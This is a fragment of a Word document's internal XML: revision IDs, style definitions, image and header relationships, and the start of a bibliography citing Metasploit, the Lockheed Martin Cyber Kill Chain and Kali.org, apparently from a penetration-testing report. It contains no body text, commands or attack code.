    <w:rsid w:val="00422DE1"/>
    <w:rsid w:val="004331D6"/>
    <w:rsid w:val="00440CA0"/>
    <w:rsid w:val="00442209"/>
    <w:rsid w:val="00442CC2"/>
    <w:rsid w:val="00444038"/>
    <w:rsid w:val="00444D0E"/>
    <w:rsid w:val="0044528E"/>
    <w:rsid w:val="004472B1"/>
    <w:rsid w:val="004545B4"/>
    <w:rsid w:val="004547F0"/>
    <w:rsid w:val="0045772B"/>
    <w:rsid w:val="00460AAA"/>
    <w:rsid w:val="0046550C"/>
    <w:rsid w:val="00467048"/>
    <w:rsid w:val="00471010"/>
    <w:rsid w:val="00471450"/>
    <w:rsid w:val="004722B9"/>
    <w:rsid w:val="004726D0"/>
    <w:rsid w:val="00474610"/>
    <w:rsid w:val="00475A84"/>
    <w:rsid w:val="00475E77"/>
    <w:rsid w:val="004834CB"/>
    <w:rsid w:val="004872D3"/>
    <w:rsid w:val="004907A9"/>
    <w:rsid w:val="0049158D"/>
    <w:rsid w:val="00495973"/>
    <w:rsid w:val="004A119F"/>
    <w:rsid w:val="004A13CB"/>
    <w:rsid w:val="004A20E1"/>
    <w:rsid w:val="004A364A"/>
    <w:rsid w:val="004B099F"/>
    <w:rsid w:val="004B0AED"/>
    <w:rsid w:val="004B13AF"/>
    <w:rsid w:val="004B17CD"/>
    <w:rsid w:val="004B2B5D"/>
    <w:rsid w:val="004C4742"/>
    <w:rsid w:val="004D042D"/>
    <w:rsid w:val="004D1AA4"/>
    <w:rsid w:val="004D6270"/>
    <w:rsid w:val="004D6D18"/>
    <w:rsid w:val="004D6E2C"/>
    <w:rsid w:val="004D7B8D"/>
    <w:rsid w:val="004E2E5B"/>
    <w:rsid w:val="004E373C"/>
    <w:rsid w:val="004E521A"/>
    <w:rsid w:val="005016FE"/>
    <w:rsid w:val="00510547"/>
    <w:rsid w:val="005107A0"/>
    <w:rsid w:val="00512A20"/>
    <w:rsid w:val="005132E4"/>
    <w:rsid w:val="00517387"/>
    <w:rsid w:val="00523A53"/>
    <w:rsid w:val="00524C41"/>
    <w:rsid w:val="00526443"/>
    <w:rsid w:val="00527048"/>
    <w:rsid w:val="00531000"/>
    <w:rsid w:val="005321AD"/>
    <w:rsid w:val="005330C9"/>
    <w:rsid w:val="00536B65"/>
    <w:rsid w:val="00540BFA"/>
    <w:rsid w:val="0055513B"/>
    <w:rsid w:val="00562B11"/>
    <w:rsid w:val="0056315B"/>
    <w:rsid w:val="005634F6"/>
    <w:rsid w:val="00564018"/>
    <w:rsid w:val="00564FED"/>
    <w:rsid w:val="0057052A"/>
    <w:rsid w:val="0057177A"/>
    <w:rsid w:val="005728A6"/>
    <w:rsid w:val="00576826"/>
    <w:rsid w:val="00577D8E"/>
    <w:rsid w:val="005806BF"/>
    <w:rsid w:val="00580DFD"/>
    <w:rsid w:val="00585FD6"/>
    <w:rsid w:val="00592D90"/>
    <w:rsid w:val="00594C35"/>
    <w:rsid w:val="00595F3C"/>
    <w:rsid w:val="005A0AAD"/>
    <w:rsid w:val="005A29C7"/>
    <w:rsid w:val="005A42CB"/>
    <w:rsid w:val="005A6F5C"/>
    <w:rsid w:val="005B33A8"/>
    <w:rsid w:val="005B3FFF"/>
    <w:rsid w:val="005B4BA5"/>
    <w:rsid w:val="005B50C5"/>
    <w:rsid w:val="005C490F"/>
    <w:rsid w:val="005C4ADA"/>
    <w:rsid w:val="005C6427"/>
    <w:rsid w:val="005D2234"/>
    <w:rsid w:val="005D4288"/>
    <w:rsid w:val="005E185E"/>
    <w:rsid w:val="005E2A94"/>
    <w:rsid w:val="00600F7B"/>
    <w:rsid w:val="00603060"/>
    <w:rsid w:val="006053DB"/>
    <w:rsid w:val="00605B5D"/>
    <w:rsid w:val="00612B40"/>
    <w:rsid w:val="00614035"/>
    <w:rsid w:val="006174A0"/>
    <w:rsid w:val="00617E74"/>
    <w:rsid w:val="00621F65"/>
    <w:rsid w:val="00624138"/>
    <w:rsid w:val="0062501A"/>
    <w:rsid w:val="0062703D"/>
    <w:rsid w:val="00631078"/>
    <w:rsid w:val="006325B5"/>
    <w:rsid w:val="00642432"/>
    <w:rsid w:val="006439C6"/>
    <w:rsid w:val="00646F41"/>
    <w:rsid w:val="00647078"/>
    <w:rsid w:val="00653C96"/>
    <w:rsid w:val="006549C6"/>
    <w:rsid w:val="00661CB5"/>
    <w:rsid w:val="006628BB"/>
    <w:rsid w:val="00670051"/>
    <w:rsid w:val="0067245A"/>
    <w:rsid w:val="006769BF"/>
    <w:rsid w:val="00677F40"/>
    <w:rsid w:val="00681A32"/>
    <w:rsid w:val="00683277"/>
    <w:rsid w:val="00684EAA"/>
    <w:rsid w:val="00690B21"/>
    <w:rsid w:val="006919A0"/>
    <w:rsid w:val="00695836"/>
    <w:rsid w:val="0069762D"/>
    <w:rsid w:val="006A5704"/>
    <w:rsid w:val="006A624F"/>
    <w:rsid w:val="006A7835"/>
    <w:rsid w:val="006B0D64"/>
    <w:rsid w:val="006B2D05"/>
    <w:rsid w:val="006B6889"/>
    <w:rsid w:val="006B6E77"/>
    <w:rsid w:val="006C424D"/>
    <w:rsid w:val="006C5AA5"/>
    <w:rsid w:val="006D1358"/>
    <w:rsid w:val="006D2E43"/>
    <w:rsid w:val="006D3EC9"/>
    <w:rsid w:val="006D4E23"/>
    <w:rsid w:val="006E2DA3"/>
    <w:rsid w:val="006E46AB"/>
    <w:rsid w:val="006E68D6"/>
    <w:rsid w:val="006F042B"/>
    <w:rsid w:val="006F21D4"/>
    <w:rsid w:val="006F41C0"/>
    <w:rsid w:val="00702B3B"/>
    <w:rsid w:val="00704E50"/>
    <w:rsid w:val="007056BB"/>
    <w:rsid w:val="00707390"/>
    <w:rsid w:val="00707A48"/>
    <w:rsid w:val="00711D54"/>
    <w:rsid w:val="0072116A"/>
    <w:rsid w:val="00724A80"/>
    <w:rsid w:val="00724AAC"/>
    <w:rsid w:val="00725294"/>
    <w:rsid w:val="007321F2"/>
    <w:rsid w:val="0073637A"/>
    <w:rsid w:val="00737639"/>
    <w:rsid w:val="0074040B"/>
    <w:rsid w:val="0074408C"/>
    <w:rsid w:val="007441F5"/>
    <w:rsid w:val="007516C3"/>
    <w:rsid w:val="007675EA"/>
    <w:rsid w:val="00767776"/>
    <w:rsid w:val="00771D62"/>
    <w:rsid w:val="00775581"/>
    <w:rsid w:val="0077607C"/>
    <w:rsid w:val="0077749A"/>
    <w:rsid w:val="00780EA7"/>
    <w:rsid w:val="0078669E"/>
    <w:rsid w:val="007869B1"/>
    <w:rsid w:val="007934C7"/>
    <w:rsid w:val="00794B27"/>
    <w:rsid w:val="007964F5"/>
    <w:rsid w:val="00796962"/>
    <w:rsid w:val="007A009E"/>
    <w:rsid w:val="007A26F8"/>
    <w:rsid w:val="007A3FC9"/>
    <w:rsid w:val="007B6148"/>
    <w:rsid w:val="007B664E"/>
    <w:rsid w:val="007B7BDC"/>
    <w:rsid w:val="007C5183"/>
    <w:rsid w:val="007C6436"/>
    <w:rsid w:val="007C694B"/>
    <w:rsid w:val="007C7122"/>
    <w:rsid w:val="007D13FC"/>
    <w:rsid w:val="007D415E"/>
    <w:rsid w:val="007D5446"/>
    <w:rsid w:val="007D57E0"/>
    <w:rsid w:val="007D6A75"/>
    <w:rsid w:val="007D7E5B"/>
    <w:rsid w:val="007E43B8"/>
    <w:rsid w:val="007E4F73"/>
    <w:rsid w:val="007F5756"/>
    <w:rsid w:val="007F7302"/>
    <w:rsid w:val="007F7746"/>
    <w:rsid w:val="00803D8F"/>
    <w:rsid w:val="008057B2"/>
    <w:rsid w:val="0080738A"/>
    <w:rsid w:val="00807F93"/>
    <w:rsid w:val="00821608"/>
    <w:rsid w:val="00821750"/>
    <w:rsid w:val="00821DC9"/>
    <w:rsid w:val="00822407"/>
    <w:rsid w:val="0082386A"/>
    <w:rsid w:val="00824A80"/>
    <w:rsid w:val="00845125"/>
    <w:rsid w:val="0084605C"/>
    <w:rsid w:val="008476B6"/>
    <w:rsid w:val="008513E5"/>
    <w:rsid w:val="00865651"/>
    <w:rsid w:val="0086733F"/>
    <w:rsid w:val="008708F3"/>
    <w:rsid w:val="008745AB"/>
    <w:rsid w:val="00875E0F"/>
    <w:rsid w:val="00882684"/>
    <w:rsid w:val="00882FFE"/>
    <w:rsid w:val="00885C1C"/>
    <w:rsid w:val="00886A63"/>
    <w:rsid w:val="00887306"/>
    <w:rsid w:val="0089393F"/>
    <w:rsid w:val="0089515F"/>
    <w:rsid w:val="008963A5"/>
    <w:rsid w:val="00897897"/>
    <w:rsid w:val="008A188C"/>
    <w:rsid w:val="008A5218"/>
    <w:rsid w:val="008A5CD8"/>
    <w:rsid w:val="008A60BD"/>
    <w:rsid w:val="008B0E3B"/>
    <w:rsid w:val="008B3E24"/>
    <w:rsid w:val="008B65F9"/>
    <w:rsid w:val="008B6C0B"/>
    <w:rsid w:val="008B6EB0"/>
    <w:rsid w:val="008B795C"/>
    <w:rsid w:val="008C3090"/>
    <w:rsid w:val="008D0A66"/>
    <w:rsid w:val="008D332F"/>
    <w:rsid w:val="008D57E9"/>
    <w:rsid w:val="008E3D12"/>
    <w:rsid w:val="008E5C17"/>
    <w:rsid w:val="008E79FD"/>
    <w:rsid w:val="008F359A"/>
    <w:rsid w:val="008F3C36"/>
    <w:rsid w:val="008F3C94"/>
    <w:rsid w:val="008F6432"/>
    <w:rsid w:val="008F6D01"/>
    <w:rsid w:val="009001AA"/>
    <w:rsid w:val="00901225"/>
    <w:rsid w:val="00904B28"/>
    <w:rsid w:val="009064AE"/>
    <w:rsid w:val="00915803"/>
    <w:rsid w:val="00920FCD"/>
    <w:rsid w:val="00922A12"/>
    <w:rsid w:val="00922E3A"/>
    <w:rsid w:val="00923B2E"/>
    <w:rsid w:val="00927D65"/>
    <w:rsid w:val="009303CA"/>
    <w:rsid w:val="00930C28"/>
    <w:rsid w:val="00933727"/>
    <w:rsid w:val="00940D3D"/>
    <w:rsid w:val="00954B74"/>
    <w:rsid w:val="0095659E"/>
    <w:rsid w:val="00956B82"/>
    <w:rsid w:val="009574C9"/>
    <w:rsid w:val="00964A7F"/>
    <w:rsid w:val="009651A4"/>
    <w:rsid w:val="009665D7"/>
    <w:rsid w:val="00970436"/>
    <w:rsid w:val="009717A4"/>
    <w:rsid w:val="00972926"/>
    <w:rsid w:val="00976636"/>
    <w:rsid w:val="009768E5"/>
    <w:rsid w:val="009779DF"/>
    <w:rsid w:val="00982D82"/>
    <w:rsid w:val="009842CC"/>
    <w:rsid w:val="0098567E"/>
    <w:rsid w:val="00985CD3"/>
    <w:rsid w:val="009864AC"/>
    <w:rsid w:val="009867FC"/>
    <w:rsid w:val="00986BCD"/>
    <w:rsid w:val="00990014"/>
    <w:rsid w:val="00994CB3"/>
    <w:rsid w:val="00997D88"/>
    <w:rsid w:val="009A2151"/>
    <w:rsid w:val="009A2A60"/>
    <w:rsid w:val="009A37C5"/>
    <w:rsid w:val="009A58F6"/>
    <w:rsid w:val="009A7F30"/>
    <w:rsid w:val="009B1289"/>
    <w:rsid w:val="009B3379"/>
    <w:rsid w:val="009B6A78"/>
    <w:rsid w:val="009C0E3F"/>
    <w:rsid w:val="009C7A56"/>
    <w:rsid w:val="009D54B9"/>
    <w:rsid w:val="009E25FA"/>
    <w:rsid w:val="009E5063"/>
    <w:rsid w:val="009E6367"/>
    <w:rsid w:val="009E7121"/>
    <w:rsid w:val="009F176D"/>
    <w:rsid w:val="009F233A"/>
    <w:rsid w:val="009F3FDA"/>
    <w:rsid w:val="009F4C6E"/>
    <w:rsid w:val="00A00EB2"/>
    <w:rsid w:val="00A10044"/>
    <w:rsid w:val="00A10102"/>
    <w:rsid w:val="00A108C7"/>
    <w:rsid w:val="00A11451"/>
    <w:rsid w:val="00A140A2"/>
    <w:rsid w:val="00A20886"/>
    <w:rsid w:val="00A23C74"/>
    <w:rsid w:val="00A312F0"/>
    <w:rsid w:val="00A33FB4"/>
    <w:rsid w:val="00A34FC6"/>
    <w:rsid w:val="00A36AFD"/>
    <w:rsid w:val="00A37AE2"/>
    <w:rsid w:val="00A37AED"/>
    <w:rsid w:val="00A404A5"/>
    <w:rsid w:val="00A5608C"/>
    <w:rsid w:val="00A60DA5"/>
    <w:rsid w:val="00A628B1"/>
    <w:rsid w:val="00A630D1"/>
    <w:rsid w:val="00A63995"/>
    <w:rsid w:val="00A653F9"/>
    <w:rsid w:val="00A66F1E"/>
    <w:rsid w:val="00A67103"/>
    <w:rsid w:val="00A73DD5"/>
    <w:rsid w:val="00A75894"/>
    <w:rsid w:val="00A771BB"/>
    <w:rsid w:val="00A82219"/>
    <w:rsid w:val="00A82697"/>
    <w:rsid w:val="00A86C54"/>
    <w:rsid w:val="00A90F45"/>
    <w:rsid w:val="00A93111"/>
    <w:rsid w:val="00A93954"/>
    <w:rsid w:val="00A93A0D"/>
    <w:rsid w:val="00AA4A8E"/>
    <w:rsid w:val="00AA6ADC"/>
    <w:rsid w:val="00AA7B96"/>
    <w:rsid w:val="00AB381E"/>
    <w:rsid w:val="00AB7726"/>
    <w:rsid w:val="00AC25FA"/>
    <w:rsid w:val="00AC4134"/>
    <w:rsid w:val="00AC66FC"/>
    <w:rsid w:val="00AC6E3D"/>
    <w:rsid w:val="00AD2AD4"/>
    <w:rsid w:val="00AD4D03"/>
    <w:rsid w:val="00AD7DC8"/>
    <w:rsid w:val="00AE347C"/>
    <w:rsid w:val="00AE40C8"/>
    <w:rsid w:val="00AF0C1F"/>
    <w:rsid w:val="00AF28A5"/>
    <w:rsid w:val="00AF325C"/>
    <w:rsid w:val="00B02101"/>
    <w:rsid w:val="00B04708"/>
    <w:rsid w:val="00B1611E"/>
    <w:rsid w:val="00B21B11"/>
    <w:rsid w:val="00B23E69"/>
    <w:rsid w:val="00B24D47"/>
    <w:rsid w:val="00B262F4"/>
    <w:rsid w:val="00B27A6B"/>
    <w:rsid w:val="00B319E5"/>
    <w:rsid w:val="00B321E2"/>
    <w:rsid w:val="00B352F7"/>
    <w:rsid w:val="00B52D1B"/>
    <w:rsid w:val="00B63D7C"/>
    <w:rsid w:val="00B6691C"/>
    <w:rsid w:val="00B66E67"/>
    <w:rsid w:val="00B77F45"/>
    <w:rsid w:val="00B81962"/>
    <w:rsid w:val="00B9333B"/>
    <w:rsid w:val="00B9564B"/>
    <w:rsid w:val="00B95D20"/>
    <w:rsid w:val="00B96B8B"/>
    <w:rsid w:val="00BA3F94"/>
    <w:rsid w:val="00BA639D"/>
    <w:rsid w:val="00BB4BC1"/>
    <w:rsid w:val="00BB5752"/>
    <w:rsid w:val="00BB72AD"/>
    <w:rsid w:val="00BB7698"/>
    <w:rsid w:val="00BC445B"/>
    <w:rsid w:val="00BC6A70"/>
    <w:rsid w:val="00BC6C9B"/>
    <w:rsid w:val="00BC73CA"/>
    <w:rsid w:val="00BD124C"/>
    <w:rsid w:val="00BD2377"/>
    <w:rsid w:val="00BD2CDA"/>
    <w:rsid w:val="00BE152C"/>
    <w:rsid w:val="00BE2D9A"/>
    <w:rsid w:val="00BE2F8B"/>
    <w:rsid w:val="00BE326B"/>
    <w:rsid w:val="00BE34E6"/>
    <w:rsid w:val="00BE3A56"/>
    <w:rsid w:val="00BE6715"/>
    <w:rsid w:val="00BE7015"/>
    <w:rsid w:val="00BF217D"/>
    <w:rsid w:val="00BF3766"/>
    <w:rsid w:val="00BF3E1F"/>
    <w:rsid w:val="00BF638F"/>
    <w:rsid w:val="00BF6534"/>
    <w:rsid w:val="00C02BDA"/>
    <w:rsid w:val="00C03E32"/>
    <w:rsid w:val="00C1022B"/>
    <w:rsid w:val="00C10BA2"/>
    <w:rsid w:val="00C237A5"/>
    <w:rsid w:val="00C264FE"/>
    <w:rsid w:val="00C272D7"/>
    <w:rsid w:val="00C30876"/>
    <w:rsid w:val="00C321E5"/>
    <w:rsid w:val="00C34D71"/>
    <w:rsid w:val="00C35044"/>
    <w:rsid w:val="00C406B6"/>
    <w:rsid w:val="00C433C9"/>
    <w:rsid w:val="00C44E83"/>
    <w:rsid w:val="00C50492"/>
    <w:rsid w:val="00C53358"/>
    <w:rsid w:val="00C5369C"/>
    <w:rsid w:val="00C5636F"/>
    <w:rsid w:val="00C57344"/>
    <w:rsid w:val="00C61A33"/>
    <w:rsid w:val="00C64F5F"/>
    <w:rsid w:val="00C70BDD"/>
    <w:rsid w:val="00C7205B"/>
    <w:rsid w:val="00C824E7"/>
    <w:rsid w:val="00C82572"/>
    <w:rsid w:val="00C8342A"/>
    <w:rsid w:val="00C84F7B"/>
    <w:rsid w:val="00C862A5"/>
    <w:rsid w:val="00C86E6B"/>
    <w:rsid w:val="00C9015C"/>
    <w:rsid w:val="00C90615"/>
    <w:rsid w:val="00C92531"/>
    <w:rsid w:val="00CA02FD"/>
    <w:rsid w:val="00CA3B2A"/>
    <w:rsid w:val="00CA7D18"/>
    <w:rsid w:val="00CB14B4"/>
    <w:rsid w:val="00CC4D9C"/>
    <w:rsid w:val="00CC6D71"/>
    <w:rsid w:val="00CD0D7A"/>
    <w:rsid w:val="00CD7707"/>
    <w:rsid w:val="00CE2D4F"/>
    <w:rsid w:val="00CE3A28"/>
    <w:rsid w:val="00CE4617"/>
    <w:rsid w:val="00CE58C3"/>
    <w:rsid w:val="00CE7369"/>
    <w:rsid w:val="00CE7873"/>
    <w:rsid w:val="00CF25E6"/>
    <w:rsid w:val="00CF6A83"/>
    <w:rsid w:val="00CF780E"/>
    <w:rsid w:val="00CF7D81"/>
    <w:rsid w:val="00D01371"/>
    <w:rsid w:val="00D02EAF"/>
    <w:rsid w:val="00D063CA"/>
    <w:rsid w:val="00D06E44"/>
    <w:rsid w:val="00D1456E"/>
    <w:rsid w:val="00D1666E"/>
    <w:rsid w:val="00D202D8"/>
    <w:rsid w:val="00D21679"/>
    <w:rsid w:val="00D2452A"/>
    <w:rsid w:val="00D336FD"/>
    <w:rsid w:val="00D36DFC"/>
    <w:rsid w:val="00D414BC"/>
    <w:rsid w:val="00D4212F"/>
    <w:rsid w:val="00D42820"/>
    <w:rsid w:val="00D4316F"/>
    <w:rsid w:val="00D43432"/>
    <w:rsid w:val="00D65BC3"/>
    <w:rsid w:val="00D670B7"/>
    <w:rsid w:val="00D67BD2"/>
    <w:rsid w:val="00D71B75"/>
    <w:rsid w:val="00D725C3"/>
    <w:rsid w:val="00D74352"/>
    <w:rsid w:val="00D818E4"/>
    <w:rsid w:val="00D847F6"/>
    <w:rsid w:val="00D9134D"/>
    <w:rsid w:val="00D935C6"/>
    <w:rsid w:val="00D95A27"/>
    <w:rsid w:val="00DA02AB"/>
    <w:rsid w:val="00DA09BD"/>
    <w:rsid w:val="00DA269A"/>
    <w:rsid w:val="00DA3148"/>
    <w:rsid w:val="00DA4EE9"/>
    <w:rsid w:val="00DB3A4B"/>
    <w:rsid w:val="00DB52F4"/>
    <w:rsid w:val="00DC2D0B"/>
    <w:rsid w:val="00DC3585"/>
    <w:rsid w:val="00DC794B"/>
    <w:rsid w:val="00DD084E"/>
    <w:rsid w:val="00DD0F8F"/>
    <w:rsid w:val="00DE1C1B"/>
    <w:rsid w:val="00DE27CA"/>
    <w:rsid w:val="00DE69E2"/>
    <w:rsid w:val="00DF4831"/>
    <w:rsid w:val="00E00A13"/>
    <w:rsid w:val="00E00DF7"/>
    <w:rsid w:val="00E01C57"/>
    <w:rsid w:val="00E028E8"/>
    <w:rsid w:val="00E049F8"/>
    <w:rsid w:val="00E05E74"/>
    <w:rsid w:val="00E064DF"/>
    <w:rsid w:val="00E10B9F"/>
    <w:rsid w:val="00E13F8C"/>
    <w:rsid w:val="00E16CFB"/>
    <w:rsid w:val="00E207A7"/>
    <w:rsid w:val="00E21872"/>
    <w:rsid w:val="00E22140"/>
    <w:rsid w:val="00E23054"/>
    <w:rsid w:val="00E23194"/>
    <w:rsid w:val="00E30DFC"/>
    <w:rsid w:val="00E3398A"/>
    <w:rsid w:val="00E42175"/>
    <w:rsid w:val="00E4288C"/>
    <w:rsid w:val="00E43B28"/>
    <w:rsid w:val="00E4469F"/>
    <w:rsid w:val="00E4496C"/>
    <w:rsid w:val="00E46F05"/>
    <w:rsid w:val="00E47814"/>
    <w:rsid w:val="00E517F5"/>
    <w:rsid w:val="00E5266E"/>
    <w:rsid w:val="00E5401B"/>
    <w:rsid w:val="00E61CA2"/>
    <w:rsid w:val="00E65552"/>
    <w:rsid w:val="00E65F62"/>
    <w:rsid w:val="00E670F7"/>
    <w:rsid w:val="00E70494"/>
    <w:rsid w:val="00E71CC5"/>
    <w:rsid w:val="00E72979"/>
    <w:rsid w:val="00E7393E"/>
    <w:rsid w:val="00E73C42"/>
    <w:rsid w:val="00E74B98"/>
    <w:rsid w:val="00E82204"/>
    <w:rsid w:val="00E83DA7"/>
    <w:rsid w:val="00E874BF"/>
    <w:rsid w:val="00E905DB"/>
    <w:rsid w:val="00E955F5"/>
    <w:rsid w:val="00E966E9"/>
    <w:rsid w:val="00E97BCB"/>
    <w:rsid w:val="00E97C0A"/>
    <w:rsid w:val="00EA38FD"/>
    <w:rsid w:val="00EA5E98"/>
    <w:rsid w:val="00EA70F1"/>
    <w:rsid w:val="00EB176C"/>
    <w:rsid w:val="00EB6577"/>
    <w:rsid w:val="00EC48B5"/>
    <w:rsid w:val="00EC695B"/>
    <w:rsid w:val="00ED3E5B"/>
    <w:rsid w:val="00ED4561"/>
    <w:rsid w:val="00ED6E4B"/>
    <w:rsid w:val="00EE15F4"/>
    <w:rsid w:val="00EE1ED5"/>
    <w:rsid w:val="00EE7DC0"/>
    <w:rsid w:val="00EF7E65"/>
    <w:rsid w:val="00F036D5"/>
    <w:rsid w:val="00F10012"/>
    <w:rsid w:val="00F1014D"/>
    <w:rsid w:val="00F10EF4"/>
    <w:rsid w:val="00F15015"/>
    <w:rsid w:val="00F225D5"/>
    <w:rsid w:val="00F25EDA"/>
    <w:rsid w:val="00F30827"/>
    <w:rsid w:val="00F36792"/>
    <w:rsid w:val="00F41865"/>
    <w:rsid w:val="00F45B21"/>
    <w:rsid w:val="00F46D7B"/>
    <w:rsid w:val="00F53426"/>
    <w:rsid w:val="00F540B4"/>
    <w:rsid w:val="00F552E7"/>
    <w:rsid w:val="00F63911"/>
    <w:rsid w:val="00F801B9"/>
    <w:rsid w:val="00F816C0"/>
    <w:rsid w:val="00F81E31"/>
    <w:rsid w:val="00F85545"/>
    <w:rsid w:val="00F90D16"/>
    <w:rsid w:val="00F916D9"/>
    <w:rsid w:val="00F946E9"/>
    <w:rsid w:val="00F94756"/>
    <w:rsid w:val="00F95DB5"/>
    <w:rsid w:val="00FA12AF"/>
    <w:rsid w:val="00FA1BE5"/>
    <w:rsid w:val="00FA5300"/>
    <w:rsid w:val="00FA68FF"/>
    <w:rsid w:val="00FB0A5A"/>
    <w:rsid w:val="00FB5B99"/>
    <w:rsid w:val="00FC0257"/>
    <w:rsid w:val="00FC2E01"/>
    <w:rsid w:val="00FC2F0A"/>
    <w:rsid w:val="00FC426D"/>
    <w:rsid w:val="00FC7E9E"/>
    <w:rsid w:val="00FD1A9B"/>
    <w:rsid w:val="00FD3061"/>
    <w:rsid w:val="00FD3EBC"/>
    <w:rsid w:val="00FD5288"/>
    <w:rsid w:val="00FE0621"/>
    <w:rsid w:val="00FE6814"/>
    <w:rsid w:val="00FE730A"/>
    <w:rsid w:val="00FF1EB9"/>
    <w:rsid w:val="00FF26B8"/>
    <w:rsid w:val="00FF3C13"/>
    <w:rsid w:val="00FF3E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CE316F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{37EDA553-40BD-4FEB-92FC-AB1D316E0E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3B7C"/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18439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F325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415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439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  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0018439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5772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5772B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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0045772B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00AF325C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zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00AF32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5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="007D415E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E4496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5A6F5C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5A6F5C"/>
    <w:rPr>
      <w:color w:val="0563C1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F6391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63911"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F63911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3E1C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1CB6"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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3E1C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1CB6"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D06E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80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0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75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56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28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9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34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06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3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87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555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658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01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70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8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45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56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9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4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687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307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0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0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79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30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88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93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65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7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13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77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67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36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03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73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202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158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665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331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6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45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5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9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83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7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42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24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2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7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4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94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22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11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9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3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53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69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9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5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1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5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49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1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8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87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06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9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710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825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56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52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4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3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913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06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83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23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5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2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40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29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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml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header" Target="header1.xml"/><Relationship Id="rId37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16.jpeg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpe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Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpe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footer" Target="footer2.xm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Rap23</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{78FC7109-50CE-4A20-A2B9-000FD3B835B6}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Rapid 7</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Metaspoit Penetration Testing Software</b:Title>
    <b:InternetSiteTitle>Rapid 7</b:InternetSiteTitle>
    <b:Year>2023</b:Year>
    <b:Month>November</b:Month>
    <b:Day>2</b:Day>
    <b:URL>https://www.rapid7.com/products/metasploit/</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>LocBC</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{CD5A2681-55BF-4885-A579-6C57FF10DA9A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Lockheed Martin</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Cyber Kill Chain</b:Title>
    <b:ProductionCompany>Lockheed Martin</b:ProductionCompany>
    <b:Year>TBC</b:Year>
    <b:Month>TBC</b:Month>
    <b:Day>TBC</b:Day>
    <b:YearAccessed>2023</b:YearAccessed>
    <b:MonthAccessed>November</b:MonthAccessed>
    <b:DayAccessed>2</b:DayAccessed>
    <b:URL>https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Kal23</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{40E1F152-5D44-45D1-AD84-C4E6DBC086D8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Kali.org</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Matasploit-Framewark</b:Title>
